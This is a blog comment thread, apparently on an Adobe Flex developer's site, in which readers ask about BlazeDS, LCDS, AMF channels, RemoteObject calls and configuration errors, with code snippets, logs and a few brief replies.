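    private function sendTest():void
    {
        var msg:AsyncMessage = new AsyncMessage();
        msg.body = "ping";
        producer.send(msg);
    }

    private function onMessage(event:MessageEvent):void
    {
        trace(event.message.body); // "ping" arrives if messaging works
    }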
Hi,
Is it possible to have a Flex web application on a server located in one place and proxy servers located in different locations (countries), so that when a user enters my URL he gets the data (if it exists) from the local server, and if it does not exist the local server is updated from the main server?
In any case, when the main server is updated with changes, the clients should be updated.
If that is possible, how can I do it?
Thanks
Hi Sujit,
I have some questions; can you please answer them? Thanks in advance.
1) When we use RemoteObject, the request is sent in binary (AMF) format, while with HTTPService or WebService the request is in XML format. Is that correct? Accordingly, in BlazeDS the AMF channel sends requests in AMF (binary) and the HTTP channel in XML. Am I right?
2) Is there any encryption and decryption of the request and response sent to/from the server?
3) What is the difference between polling and streaming in BlazeDS? Is any other type available?
4) Which concepts come under FDMS and which under the Messaging Service? Data push (Producer, Consumer) and DataService come under FDMS, and FDMS is used for serialization between server and client and between clients. So what is the Messaging Service?
5) RPC services are nothing but HTTPService, WebService and RemoteObject. Is that true?
I know how to use them, but I want to know what happens internally.
Please help me out; I am confused about these questions.
Thanks
Vijay Kumar J
Hi Sujit,
A Flex application as the producer works perfectly with BlazeDS on a different server, and Flex-to-Flex communication also works perfectly. Java does send out its message, but we are unable to find where it goes or which client receives it…
Hi Sujit,
I am working on Flex with ColdFusion and trying to gain knowledge of LCDS/BlazeDS. I have a few doubts; it would be nice if you could help me, please.
1. I have used the Flex RemoteObject to call ColdFusion CFCs for read/update/delete operations on a MS SQL Server DB in our application, without using LCDS. Now I am using LCDS, and its chart says that LCDS has RemoteObject. What is the difference between the first RemoteObject and the LCDS RemoteObject?
2. Are the Messaging Services in LCDS and BlazeDS the same? Is BlazeDS a subset of LCDS?
3. I am trying a simple chat application with the Producer/Consumer approach, but it throws an error:
"Channel.Connect.Failed error NetConnection.Call.Failed: HTTP: Status 405: url: '"
Content of messaging-config.xml:
[the configuration XML was stripped by the comment form]
Please help!!!!
Thanks,
Vikash
Hi Sujit,
I am interested in using your BlazeMonster tool for its Java to AS capability. However, I can’t seem to find any license information about it. Can you please publish a page with license information about your projects? I love what you have done and the tool works great, but unfortunately I cannot proceed without knowing what type of license the project is under. Thanks!
-Ryan
Hello Sujit, I attended the first day of your Flex boot camp at MA College of Engg, Kothamangalam, Kerala. I liked the FlashAhead web site very much. But one thing I would like to know about is Search Engine Optimization (SEO) of Flex sites, because when I view the site source it shows just an swf embedded, and I don't think that helps from the SEO perspective. So can we do SEO with Flex?
Also see this
Hi,
I'm playing around with the Zend Framework (ZF) and Flash Builder 4 (FB4), and I'm a bit lost. I read about the new features in FB4 for connecting with data, so I configured a new ZF project with a virtual host ().
I followed the structure recommended on the ZF site, having the library one level behind the public_html folder. I created some controllers: default, admin and service. The default controller launches the Flex app, the admin controller serves HTML and JavaScript, and the services controller is my message broker, where I start the Zend_Amf_Server.
The problems came when I tried to set up the data services in FB4: I can't get to the services controller.
In the URL I specify
where services is the name of the controller and amf is the action where I start the Zend_Amf_Server and use the addDirectory() function to specify the "services" folder under /application/services.
But I can't get it to load the services in FB4.
In the file field of the FB4 data services wizard I select the index.php in public_html, since it reroutes the requests to the services controller and amf action.
But it doesn't work. My objective is to use ZF as the server platform and Flash (Flex) on the client side for the front-end, with ZF and XHTML+Ajax on the backend.
How can I do this? Can you give me some light?
Thanks
Hi sujit,
Thank you very much for your reply for my earlier post.I’m using flex 3, java, blazeds and spring framework for web application development.
I’m handling session expire event in java side and flex side in following way.
I’m setting a sessionId session attribute in flex session once user login to the system. It is done in a java class following way.
FlexSession session= FlexContext.getFlexSession();
session.setAttribute(“sessionId”, session.getId());
Then in each remote call I’m checking the session id as in following code.
if((session.getAttribute(“sessionId”)==null) || session.getAttribute(“sessionId”)!=session.getId()){
throw new Exception(“no session”);
}
If the session attribute is null or the stored session id is not equal to the current session id, the exception is thrown.
I catch this exception on the Flex client side in the fault handler of the remote object call and display the login page:
public function userListFaultHandler(event:FaultEvent):void
{
    if (event.fault.faultString == "no session")
    {
        // Shows the login page.
        Application.application.showLoginView();
    }
}
Can you see any issues or cons in this approach?
Thanks
Hi Sujit,
[the messaging-config.xml and services-config.xml snippets were stripped by the comment form; only scattered values survive: a polling interval of 15, logging prefix "[BlazeDS]", and filter patterns Endpoint.*, Service.* and Configuration]
Any pointers are highly appreciated.
thanks
ilikeflex
Doing repost… the message-time-to-live is in the destination properties, and I am using AMF polling to get the messages.
Thanks
ilikeflex
Thank you so much for your excellent work and support. I recently decided to take out WebORB and replace it with BlazeDS and BlazeMonster-generated code. I’m under the gun for a demo to sell Flex to my management.
I noticed that with BlazeDS/Monster-generated code, all collections are ArrayCollections, rather than Arrays by default with WebORB. I have a complex (deeply nested and circular) object model and I need to fetch large record sets to the client. When I switched to the Blaze solution, I noticed a considerable slow down in performance.
My question is: can I make Blaze send only Arrays (and make the corresponding changes in the generated VOs), and then just convert to ArrayCollections on the client when/if needed? I suspect this will recover the performance hit I took by switching. I can easily fix up the generated VO code, but how do I force BlazeDS to send only generic arrays? Is there a setting somewhere?
Thanks again for your generous support to the Flex community.
John K.
Hi Sujit,
I have to traverse an XML tree and build an object (for instance a Map) that records each parent and its children as a collection (parent id -> collection). My XML is similar to this.
I should have the properties of each node as object properties. What is the best way to do this?
Thanks.
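Since the sample XML was stripped from the post, here is a hedged E4X sketch that assumes nodes carry an id attribute; it walks the tree recursively and records, for each parent id, an array of its children's ids:

    private function collectChildren(node:XML, result:Object):void
    {
        if (node.@id.length() > 0)
        {
            var ids:Array = [];
            for each (var child:XML in node.children())
            {
                if (child.@id.length() > 0)
                    ids.push(String(child.@id));
            }
            result[String(node.@id)] = ids; // parent id -> child ids
        }
        // Recurse into every child node.
        for each (var c:XML in node.children())
            collectChildren(c, result);
    }

Node attributes can be copied onto a per-node object the same way, by iterating node.attributes().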
Hi Sujit,
I want to pass custom properties like host and port to the Java class specified in remoting-config.xml.
I tried something like this:

<destination id="CxJavaAPI">
    <properties>
        <source>com.selectica.javaapi.CxJavaAPI</source>
    </properties>
    <remote-host>localhost</remote-host>
    <remote-port>7000</remote-port>
</destination>
but I am getting an error like:
**** MessageBrokerServlet failed to initialize due to runtime exception: Exception: flex.messaging.config.ConfigurationException: Unrecognized tag found in . Please consult the documentation to determine if the tag is invalid or belongs inside of a different tag:
‘/remote-host’ in destination with id: ‘CxJavaAPI’ from file: remoting-config.xml
‘/remote-port’ in destination with id: ‘CxJavaAPI’ from file: remoting-config.xml
Now, my class CxJavaAPI actually has a constructor which needs the host and port. Is it possible to achieve this? If yes, please let me know.
Thanks in advance,
Sayali
Hi Sujit,
I wanted to know how to get the method name of the RemoteObject call that invoked a particular handler.
At present I have a RemoteObject with various methods all using the same result handler; I just wish to 'switch' the actions based on which method invoked the handler.
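One way to do this: the AsyncToken on the result event carries the original RemotingMessage, whose operation property is the method name. A sketch (the operation names are assumptions):

    import mx.messaging.messages.RemotingMessage;
    import mx.rpc.events.ResultEvent;

    private function onResult(event:ResultEvent):void
    {
        // The token's message is the RemotingMessage that was sent.
        var op:String = RemotingMessage(event.token.message).operation;
        switch (op)
        {
            case "getUsers":  /* handle getUsers result */  break;
            case "getOrders": /* handle getOrders result */ break;
        }
    }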
Hi Sujith Reddy,
Could you please post an article on Flex profiling?
Hi Sujit,
I have a Flex application with BlazeDS, and Remote Objects are used to perform the business logic. The remote object also creates an RMI client object and communicates with the RMI server, which in turn performs some DB operations.
After approximately 30 seconds the AMF channel disconnects with a fault while the backend is still working. The AMF is simple AMF.
I have tried setting requestTimeout=0 and also -1 on the remote objects, but the result is the same.
Any help is much appreciated.
Thanks in advance.
Regards,
Latha
Channel definition
-----------------------
[the channel-definition XML was stripped by the comment form]
----------------------------------------------
remoting-config.xml
[the destination XML was stripped; the source was com.amat.raadmin.ui.service.ToolAccessManagement with scope "application"]
-------------------------------------------
Here is the log extract
———————————————
ToolAccessMngr.invokeToolMethod: Inside invokeToolMethod
‘8AFA707B-08A2-CA64-E772-4C5D7AE7D89A’ producer sending message ‘6F042089-0286-EE50-0244-4C5D8E70178F’
‘8AFA707B-08A2-CA64-E772-4C5D7AE7D89A’ producer connected.
‘8AFA707B-08A2-CA64-E772-4C5D7AE7D89A’ producer acknowledge of ‘6F042089-0286-EE50-0244-4C5D8E70178F’.)
‘DA76AE26-93A4-F6EA-57C7-4C5E0D1EB1FF’ producer set destination to ‘ToolAccessMngr’.
‘DA76AE26-93A4-F6EA-57C7-4C5E0D1EB1FF’ producer sending message connected.
‘DA76AE26-93A4-F6EA-57C7-4C5E0D1EB1FF’ producer sending message acknowledge of acknowledge of sending message ‘E48F33FF-38C7-8A6F-C67B-4C5E97FEFE56’
‘CF0DE17F-AB7F-E863-4537-4C5C61C36744’ producer channel faulted with Channel.Call.Failed NetConnection.Call.Failed: HTTP: Failed
‘8AFA707B-08A2-CA64-E772-4C5D7AE7D89A’ producer channel faulted with Channel.Call.Failed NetConnection.Call.Failed: HTTP: Failed
‘DA76AE26-93A4-F6EA-57C7-4C5E0D1EB1FF’ producer channel faulted with Channel.Call.Failed NetConnection.Call.Failed: HTTP: Failed
‘DA76AE26-93A4-F6EA-57C7-4C5E0D1EB1FF’ producer fault for ‘E48F33FF-38C7-8A6F-C67B-4C5E97FEFE56’.
[ChannelFaultEvent faultCode=”Channel.Call.Failed” faultString=”error” faultDetail=”NetConnection.Call.Failed: HTTP: Failed” channelId=”my-amf” type=”channelFault” bubbles=false cancelable=false eventPhase=2]
[ChannelFaultEvent faultCode=”Channel.Call.Failed” faultString=”error” faultDetail=”NetConnection.Call.Failed: HTTP: Failed” channelId=”my-amf” type=”channelFault” bubbles=false cancelable=false eventPhase=2]
NetConnection.Call.Failed: HTTP: Failed
NetConnection.Call.Failed: HTTP: Failed
ToolAccessMngr.invokeToolMethod: Inside invokeToolMethod
ToolAccessMngr.invokeToolMethod: Inside invokeToolMethod
‘my-amf’ channel sending message:
(mx.messaging.messages::RemotingMessage)#0
body = (Array)#1
clientId = “9E706DC1-2D0E-B462-81B5-51DE23E8F796”
destination = “ToolAccessMngr”
headers = (Object)#2
messageId = “8C4F889F-A2C9-0DC8-C43B-4C5F15892BD8”
operation = “returnToolDetails”
source = (null)
timestamp = 0
timeToLive = 0
‘my-amf’ channel polling stopped.
‘my-amf’ channel polling stopped.
‘my-amf’ channel disconnected.
‘my-amf’ channel disconnected.
‘my-amf’ channel has exhausted failover options and has reset to its primary endpoint.
‘my-amf’ channel has exhausted failover options and has reset to its primary endpoint.
‘my-amf’ channel endpoint set to
‘my-amf’ channel endpoint set to
‘CF0DE17F-AB7F-E863-4537-4C5C61C36744’ producer channel disconnected.
‘CF0DE17F-AB7F-E863-4537-4C5C61C36744’ producer channel disconnected.
‘8AFA707B-08A2-CA64-E772-4C5D7AE7D89A’ producer channel disconnected.
‘8AFA707B-08A2-CA64-E772-4C5D7AE7D89A’ producer channel disconnected.
‘DA76AE26-93A4-F6EA-57C7-4C5E0D1EB1FF’ producer channel disconnected.
‘DA76AE26-93A4-F6EA-57C7-4C5E0D1EB1FF’ producer channel disconnected.
Hi Sujit,
In my previous post, the xml tags are missing. Please find them here.
Thank you.
Channel definition:
--------------------------
[the channel-definition XML was stripped by the comment form again]
----------------------------------------------
remoting-config.xml
----------------------------------------
[the destination XML was stripped; source com.amat.raadmin.ui.service.ToolAccessManagement, scope "application"]
-------------------------------------------
Hi Sujit,
The channel disconnect problem got resolved; it was a mistake on our side. We were not using the AIR SDK for Linux but the one for Windows.
Sorry for any inconvenience.
Thanks,
Latha
Morning Sujit,
I have a problem with the new FB4. I would like to use the generated PHP wizard but cannot filter the datagrid using filter functions.
Basically, I was working on a date-range filter that can filter the data in a datagrid connected to the MySQL DB. I can only get it to work if I hard-code the whole project and use ArrayCollections in the main application.
Could you please create an example that uses dates and applies a range filter in Flash Builder 4? It would be a massive help.
Thank you
RDB.
Hi Sujit, I have a question related to Flex 3 and ColdFusion; it might be simple to answer, but I have been struggling with it for a while.
I need to create a Flex application to use with ColdFusion. This is a simple procedure when you create the project on a computer where ColdFusion is installed locally (as all the books show), but what if the ColdFusion server is installed on another machine on the network?
My current situation is the following:
– I have Flex Builder 3 installed on my PC at work, and its workspace is in a folder on the network outside of my PC.
– We have a server (ISWEB1) partitioned into two drives: C, where ColdFusion 8 is installed, and D, where all the files the developers work with reside. The ColdFusion installation runs on a server where IIS is used as the web server.
– I have drive D on the server ISWEB1 mapped to one of my drive letters and can access it easily.
– Drive C on the server can only be accessed remotely (or through the web, to reach the ColdFusion admin page) and is not exposed to the network as drive D is.
My problem is, I need to create a Flex 3 application that uses ColdFusion through the remote object access service (CF Flash Remoting), but I want to point to the installation on the server ISWEB1 and not to one installed locally. The Configure ColdFusion Server screen in Flex Builder asks me for the location of the ColdFusion root folder, web root, and root URL. There is no way I can point to the server (ISWEB1) where ColdFusion is installed, as those fields seem to require an address that points to a local install or a mapping on that local server.
So how can I create a project in Flex that uses a ColdFusion that is not installed locally? A workaround could be to use the ColdFusion Developer Edition I have installed locally during the creation of the project in Flex Builder, but then I would need all the same data sources, mappings and CFCs on my local server in order to test, which seems like double work. To aggravate that, when you try to test the application, Flex writes the files to the local server, and unless you have everything available locally it will not work properly. I am trying to avoid duplicating the work.
Hi Sujit,
I am seeking some input about session authorization. I have been assigned the task of authenticating against a MySQL data table: a userName/userPassword challenge. The development tools are Flex 4 and LCDS 3 B2. Is the Fiber model able to handle these requests? If so, can you recommend a place to start researching, or would the Spring framework be better suited for this type of task?
Thank you
Hi
I am using BlazeDS 3.2.0.3978 and WebLogic 10.0.0.1. I have the session timeout set to 5 minutes.
Below is the channel definition I am using:

<channel-definition id="my-polling-amf"
    class="mx.messaging.channels.AMFChannel">
    <endpoint
        url="http://{server.name}:{server.port}/{context.root}/messagebroker/amfpolling"
        class="flex.messaging.endpoints.AMFEndpoint"/>
    <properties>
        <polling-enabled>true</polling-enabled>
        <polling-interval-seconds>1</polling-interval-seconds>
    </properties>
</channel-definition>

I have declared the destination as:

<destination id="destICL">
    <adapter ref="actionscript" />
    <properties>
        <server>
            <message-time-to-live>120000</message-time-to-live>
        </server>
    </properties>
</destination>
I am sorry, it is 3000 messages per minute and not per second.
Thanks
ilikeflex
Hello.
Regarding building-a-database-based-app-using-flex-and-php-with-flash-builder-4:
how does that relate to two tables?
Are you an ace in Flex 3 with AIR?
Hi Sujith,
I want to develop a sample application using Java and Flex which contains just two screens: the first contains a link to the second, and the second contains the results fetched from a database. Can you please assist me, as I'm new to Flex?
Hi Sujit,
I have an AIR application on a Linux system. I am facing a channel fault after ~30 secs when the app is installed as a package using adt, while it works fine when we use adl to run the application. I am using the Linux AIR SDK for both adl and adt, but the MXML is compiled on the Windows platform. Can you please provide any pointers on what could be causing the problem?
Thanks in advance,
Latha
I have developed the dashboard in my application using Flex 3.0. For this I have used a JSP wrapper around the Flex application. My application runs on the JBoss application server. For communication between the Flex app and my application I am using LCDS; an HTTPService component is used to receive data from the server. Channel definitions are given in services-config.xml for AMF and HTTP channels, in both secure and non-secure modes. In my proxy-config.xml I have defined channels and destinations.
In my development environment both secure and non-secure modes were working fine. Now that I have deployed behind a hardware load balancer (which accepts secure requests only, and redirects non-secure requests to the secure URL) there is no response from the message broker servlet. One more thing I observed: in the non-load-balanced environment the requests look like 'http://{server.name}:{server.port}/{context.root}/messagebroker/http' and are POST requests. In the load-balanced environment with SSL the request is again a POST to 'http://{server.name}:{server.port}/{context.root}/messagebroker/http', but it is redirected to 'https://{server.name}:{server.port}/{context.root}/messagebroker/http' as a GET request, and the content returned by this GET request is null.
services-config.xml
[the channel definitions were stripped by the comment form]
proxy-config.xml
[the destinations were stripped by the comment form; the configured URLs were /kr/servlet/DashboardServlet and /kr/krportal/dashboardJSPService.jsf]
Looking for some comments
Thanks
Abhishek Gupta
Hello,
I am new to Adobe Flex and am playing around with the Adobe Flex dashboard. I have managed to customize some of the panels (pods), and I am trying to make one of the panels show a PDF document. Using the IFrame method, I managed to get the SWF file configured and can see the loading icon, but I could not manage to pass the PDF document to the panel through PodContentBase.as:
/*
 * Base class for pod content.
 */
package com.esria.samples.dashboard.view
{
    import flash.external.ExternalInterface;
    import flash.geom.Point;
    import flash.net.navigateToURL;
    import flash.xml.XMLNode;
    import mx.containers.VBox;
    import mx.controls.Alert;
    import mx.events.FlexEvent;
    import mx.events.IndexChangedEvent;
    import mx.rpc.events.FaultEvent;
    import mx.rpc.events.ResultEvent;
    import mx.rpc.http.HTTPService;
    import mx.utils.ObjectProxy;

    public class PodContentBase extends VBox
    {
        [Bindable]
        public var properties:XML; // Properties are from pods.xml.

        public function PodContentBase()
        {
            super();
            percentWidth = 100;
            percentHeight = 100;
            addEventListener(FlexEvent.CREATION_COMPLETE, onCreationComplete);
        }

        private function onCreationComplete(e:FlexEvent):void
        {
            // Load the data source declared in pods.xml.
            var httpService:HTTPService = new HTTPService();
            httpService.url = properties.@dataSource;
            if (httpService.url != "")
            {
                httpService.resultFormat = "e4x";
            }
            httpService.addEventListener(ResultEvent.RESULT, onResultHttpService);
            // Register the fault handler (it existed but was never attached).
            httpService.addEventListener(FaultEvent.FAULT, onFaultHttpService);
            httpService.send();
        }

        private function onFaultHttpService(e:FaultEvent):void
        {
            Alert.show("Unable to load datasource, " + properties.@dataSource + ".");
        }

        // Abstract: subclasses render the loaded data.
        protected function onResultHttpService(e:ResultEvent):void {}

        // Converts XML attributes in an XMLList to an Array of ObjectProxy items.
        protected function xmlListToObjectArray(xmlList:XMLList):Array
        {
            var a:Array = new Array();
            for each (var xml:XML in xmlList)
            {
                var attributes:XMLList = xml.attributes();
                var o:Object = new Object();
                for each (var attribute:XML in attributes)
                {
                    var nodeName:String = attribute.name().toString();
                    var value:*;
                    if (nodeName == "date")
                    {
                        // The attribute holds milliseconds; convert it to a Date.
                        var date:Date = new Date();
                        date.setTime(Number(attribute.toString()));
                        value = date;
                    }
                    else
                    {
                        value = attribute.toString();
                    }
                    o[nodeName] = value;
                }
                a.push(new ObjectProxy(o));
            }
            return a;
        }

        // Dispatches an event when the ViewStack index changes, which triggers a state save.
        // ViewStacks are only in ChartContent and FormContent.
        protected function dispatchViewStackChange(newIndex:Number):void
        {
            dispatchEvent(new IndexChangedEvent(IndexChangedEvent.CHANGE, true, false, null, -1, newIndex));
        }
    }
}
I am using the dashboard as a training exercise. Can you please help me with this?
Regards
Khalid Almansour
Hello Sujit,
I am new to Adobe Flex. Can I use Flex to access MS Access tables? If yes, can you please help me?
Regards
Khalid Almansour
Hi Sujit,
Thanks for your example. I want to connect to a WSDL over SSL, but I can't do it by following the steps in your example. Please help me.
Thanks very much.
Hi,
We are working on a stock-trading kind of application; it is basically a Flex desktop application, i.e. on AIR.
Our requirement is to handle 5,000 to 10,000 message updates per second in a Flex datagrid. For that we are using LCDS 2.6 messaging over the RTMP protocol.
To test this we generated around 350,000 messages in a minute and pushed them to the LCDS destination. At the client end the datagrid was able to render only 36,000 messages; the rest of the messages queued in LCDS keep rendering but exceed the 1-minute time limit.
So our question is: what is the maximum message-update rate a Flex datagrid can handle, and is there any way to optimize the datagrid to achieve the mentioned target?
Note: we already tried to override the 'collectionChangeHandler' method of the datagrid. We pass an ArrayCollection object to the dataProvider, and we also changed the ArrayCollection to an Array, since an Array has minimal event handling.
But we are still able to render only 36,000 msg/min.
Expecting your help on this issue.
Thank you very much.
SANDEEP
Hi Suman,
Please check the article in the URLs below.
Hope this helps.
Hi Khalid,
Yes, you can. Write Java code to communicate with your DB as explained here, and then access the Java class from your Flex application as explained in this article
Hope this helps.
Hi,
I tried to run your source code from "Invoking Java methods from Adobe Flex" and I get the error:
MessagingError message='Destination 'CreatingRpc' either does not exist or the destination has no channels defined….
Can you help me with this?
Thank you.
My Hello.mxml file for the above query [stripped by the comment form].
-Satheesh Reddy
Hi,
I am building a component with BlazeDS, and I have a lot of data to be updated group-wise. I have created a tab bar, and each tab contains some text fields and other controls. There is one submit button, and when I click that button all the entered information has to be passed to the server. Can anyone let me know how to do this?
Hi,
I have a doubt about the Flex column chart.
I am drawing the column chart with form=curve, and
drawing a line on mouse-over using a Cartesian data canvas. Now my problem is that I want to find the line's intersection point with the curve.
Can you give me any suggestion on this?
Hi Sujith,
Your sessions at the Hyderabad devsummit were awesome; your session gave me awareness of Flash Builder 4. Thanks to Adobe for organising the devsummit; looking forward to more devsummits and more products from Adobe.
Regards
Santosh M
Hi Sujit,
I am working on a Flex project. My client is very particular about the UI they have developed (an HTML mock-up). After some tough times my team has achieved almost all of the look and feel, but we are left with one issue: when the user presses Ctrl+scroll, the page shrinks, but the Flex component does not shrink; rather, it gets chopped off.
I tried to find solutions for this, but no luck.
I would appreciate your comments on this issue at the earliest.
Thanks in advance.
Regards,
Anshuman
I am interested in using a PHP service for logging users in to a Flex 4 application. Does Flex 4 natively store session data?
Dear Sujit,
Do you know how to deploy a BlazeDS application on WebSphere? I can see the samples (BlazeDS test drive) running, but my application is not working even though I put my project in the same location. Any help would be appreciated. Please let me know if you need more information.
Regards,
Uday.
Hi Sujit,
With reference to my previous question, I just want to ask how to optimise the Flex datagrid to render as many messages as possible within a stipulated time period.
I would appreciate your comments on this issue at the earliest.
Thanks in advance.
Sandeep
Hi Sujit,
I recently installed Flash Player 10.0.42,
and now my Flex application is not running properly:
it is not able to find services,
and it is unable to convert flex.messaging.io.amf.ASObject.
Help me out, it's very urgent.
Hi Sudheer,
Try to share code that reproduces this; at the very least the stack trace will help.
Hi Uday,
Can you please share details on what is not working? If there is any error, please share the details.
Hi Jon,
Flex will not store any session data. If your session is managed using either cookies or URL rewriting, that will work with a Flex application, because all requests go through the browser, so both cookies and URL rewriting still apply.
Hope this helps.
Hi Santosh,
Thanks for attending the summit. We too had a great time, looking forward to meet you all again 🙂
Hi Ramesh,
In your Flex application you can access all the UI controls and read the data entered. When the button is clicked, walk the UI controls in your tabs and send the data; a sketch follows.
Hope this helps.
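A sketch of that gathering step, assuming each tab is a container of TextInput controls and a RemoteObject named remoteService exists (both are assumptions); note the tabs must already be created, e.g. creationPolicy="all" on the TabNavigator:

    import mx.controls.TextInput;
    import mx.core.Container;

    private function onSubmit():void
    {
        var data:Object = {};
        for (var i:int = 0; i < tabs.numChildren; i++) // tabs: the TabNavigator
        {
            var tab:Container = tabs.getChildAt(i) as Container;
            for (var j:int = 0; j < tab.numChildren; j++)
            {
                var ti:TextInput = tab.getChildAt(j) as TextInput;
                if (ti != null)
                    data[ti.id] = ti.text; // keyed by the control's id
            }
        }
        // remoteService.save(data); // assumed destination and method
    }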
Hi Satheesh,
Can you please make sure the HelloWorld.class is in the web application classpath (WEB-INF/classes)
Hope this helps.
Hi Kayoto,
Please try the steps in the article below.
Hope this helps.
Dear Sujith,
I am Bhargava; we met at an Adobe meet a while ago, and I had a great time with you.
I have an issue with communication between AIR and Flex: my main concern is that I would like to invoke an AIR application from Flex and vice versa.
Please guide me on how to do this. I tried many ways, like implementing a common interface and placing the AIR swf in Flex, but I could not succeed. Thanks in advance.
Bhargava V
Hi Sujit,
1. I want to add a button to a tab navigator with a label taken dynamically from XML. That is, if I add a new node to the existing XML, my tab navigator should show a button with the label specified in the node.
2. How should I fix the width of the button for a variable-length value coming from the XML node?
Hi Sujith,
I am trying to build an application using the Data Management Service in LCDS, and I need to show data from an Oracle database in a datagrid. I have set up the database connection and used SQLAssembler in data-management-config.xml, but when I run the application I get an error like this:
ReferenceError: Error #1069: Property maxFrequency not found on mx.data.DataManagementConsumer and there is no default value.
I have set the inbound and outbound frequency in the config.xml.
Can you please solve this for me?
Hi,
I am using Flex 3.3 and BlazeDS 3.3.0.9520. I am getting the error:
[FaultEvent fault=[RPC Fault faultString=”Send failed”
faultCode=”Client.Error.MessageSend”
faultDetail=”Channel.Ping.Failed error null url:
‘'”]
messageId=”963746F4-07A8-B1B6-09D4-DEE3BF9EDCD3″
type=”fault” bubbles=false cancelable=true
eventPhase=2]
when I delete the browser cookies or restart the server, on the first call to the server. I am specifying the endpoint on the RemoteObject explicitly.
Is any setting required in services-config if we set the endpoint on the remote object externally?
Please let me know if you want more information from me.
Awaiting your prompt reply!
Thanks!
Ragini
I'm using Flash Builder 4 Beta 2 and DCD for JSON parsing. I have a data entity with a property of array type.
The .fml file shows it like this
I get a JSON parse error whenever it encounters an empty array like this: { "something":[] }
1. Do you know where I can get the source for the plugin, com.adobe.serializers.json…, so I can debug?
2. Where can I find any doc on the .fml format to configure certain parsing rules?
hello~!
I have a question:
how do I convert an AS object to a Java object?
Hi Sujit,
I met you at the Dev Summit in Chennai.
I am facing an issue sending a JSON request using httpService.send():
it shows an error that variables are not defined, though I am sending only a String.
Can you provide me an example of this?
Hey,
In order to retrieve embedded metadata from an .FLV file, do you have to load the .flv through a NetStream object? What if you just want to retrieve the data to make a cue-point list and not load/play the .flv?
Thank you,
George
I downloaded the BlazeDS turnkey integrated with Tomcat 6 from the following link and followed the instructions on how to install (here is the link ..). This installation is not configured for port 8400 but is instead configured for port 8080. I can't figure this thing out. Any ideas?
Hi,
Great job!
I am using Flash Builder 4 and ColdFusion; I've tried your tutorials and have an idea of how DCD works. The question is whether DCD can be used with a remote ColdFusion server and still have all the easy-to-use functionality you present in your tutorials. It would be great if you wrote a tutorial or pointed me to another website. All I need to know is how to set up the ColdFusion root folder, web root and root URL, and then just connect to a data service.
Thank you,
Giorgos
Hi,
I am Subhash, working on a Flex chat application using BlazeDS.
I want to write all the chat that I send to the client into a text file. Here is what I am doing:

private function send3():void
{
    producer.send(message);
    // Remote object call that should append the text to a file on the server.
    RmSrv.writetofile("poposdfasdfasdfsdf");
}

While running the application I get the following error:
"Channel.Security.Error error Error #2048 url: ''"
If I comment out the remote object call
//RmSrv.writetofile("poposdfasdfasdfsdf");
the application works, but nothing is written to the file. I want to write to a file; how can I do this?
Where do I need to tune things, and which config file do I need to change?
Hi Sujith,
I recently updated to Flash Player 10.0.42. My code works perfectly in 10.0.32 but gives me the following error. Below is the stack trace:
[BlazeDS][DEBUG] Deserializing AMF/HTTP request
Version: 3
(Message #0 targetURI=null, responseURI=/3)
(Array #0)
[0] = (Typed Object #0 ‘flex.messaging.messages.RemotingMessage’)
source = null
operation = “getMultiFirm”
headers = (Object #1)
DSEndpoint = null
DSId = “82877EDF-C109-AF1F-E137-6A88F32C77E8”
destination = “entitlement”
timeToLive = 0
clientId = “8288AF3A-CB09-FB03-ECCC-A4C9A02D49D1”
timestamp = 0
messageId = “C1A5D3AA-5FEE-5F05-B33A-4D3932A54275”
body = (Array #2)
[0] = (Object #3)
kopsid = null
action = null
payload = (Externalizable Object #4 ‘flex.messaging.io.ArrayCollection’)
(Array #5)
[0] = (Typed Object #6 ‘com.test.abcd.genericrequest.RequestParams’)
value = “AMFDATA”
key = “RESPONSETYPE”
msgtype = null
version = “1.0”
[BlazeDS][DEBUG] Serializing AMF/HTTP response
Version: 3
(Message #0 targetURI=/3/onStatus, responseURI=)
(Typed Object #0 ‘flex.messaging.messages.ErrorMessage’)
rootCause = (Typed Object #1 ‘java.lang.ClassCastException’)
localizedMessage = “flex.messaging.io.amf.ASObject”
message = “flex.messaging.io.amf.ASObject”
cause = null
destination = “entitlement”
headers = (Object #2)
correlationId = “C1A5D3AA-5FEE-5F05-B33A-4D3932A54275”
faultString = “flex.messaging.io.amf.ASObject”
messageId = “8288B371-E509-702F-EA1F-D8224ED62A8B”
faultCode = “Server.Processing”
timeToLive = 0.0
extendedData = null
faultDetail = null
clientId = “8288AF3A-CB09-FB03-ECCC-A4C9A02D49D1”
timestamp = 1.264015980725E12
body = null
The RequestParams object is serializable, and I am using ArrayCollection in the Flex UI.
Please help, this is urgent. This works perfectly fine in Flash 9 and 10.0.32, but gives errors in 10.0.42.
Dear Sujith,
I am a Flex/Java developer. Please suggest a sample project in Flex 3 or Flex 4.
Waiting for your kind reply.
Thanks in advance.
Hi Sujeet,
I am new to Flex.
I have developed a small Flex application which calls a web service that is on my machine.
I deployed the Flex application in IIS.
When I browse the swf file from IIS, the following error is thrown:
"[RPC Fault faultString="Security error accessing url" faultCode="Channel.Security.Error" faultDetail="Unable to load WSDL. If currently online, please verify the URI and/or format of the WSDL"
Do I need to set anything in IIS?
Thanks,
Naresh
Hi Sujith,
I am Chandra and working on Flex, currently with Flex calendars. Can you please give me an idea of how to create a calendar with events in Flex or ActionScript? This is urgent; please help me.
Regards,
Chandra.
Hi Sujeet,
I am Naresh, new to Flex.
I created a simple application where a user can upload images to a server.
I deployed my application in IIS, and when I run the application from IIS it gives me the following error:
SecurityError: Error #2148: SWF file cannot access local resource:\ToPublish\ReceiveImages\UploadedFiles\20101\26\People01.gif. Only local-with-filesystem and trusted local SWF files may access local resources.
I have copied the crossdomain.xml file to the root directory of IIS.
This is my code to upload the image:

request = new URLRequest("" + strUserName);
request.method = URLRequestMethod.POST;
file.upload(request, file.name);

Thanks
Naresh
Hi Sujeet,
I am Naresh, new to Flex.
I have developed a simple application which uploads images to the server and shows them in a horizontal list box.
I provided an "AddPhoto" button which, on click, displays a module that pops up a file dialog box.
There is an upload button in the module form. When the user clicks it after selecting an image, I send a request to a web page which is also in IIS; the web page receives the images and saves the files on the server.
I am using the following code in Flex to upload the file:

request = new URLRequest("" + strUserName);
request.method = URLRequestMethod.POST;
file.upload(request, file.name);

This works fine when I run the app from Flex Builder: images are uploaded and displayed in the horizontal box I use to display uploaded images (whenever a user uploads, I store the path in a collection and assign this collection as the dataProvider of the horizontal list box).
I deployed my application in IIS, and when I browse my swf file URL from another machine, the first upload works but the images are not displayed in the horizontal list box. Also, when I click the "AddPhoto" button a second time, my screen gets disabled and nothing happens.
Thanks,
Naresh
Hi Naresh,
I think you need to edit the crossdomain.xml file on your local machine; have a look at Adobe's knowledge base site at
thanks,
Giorgos
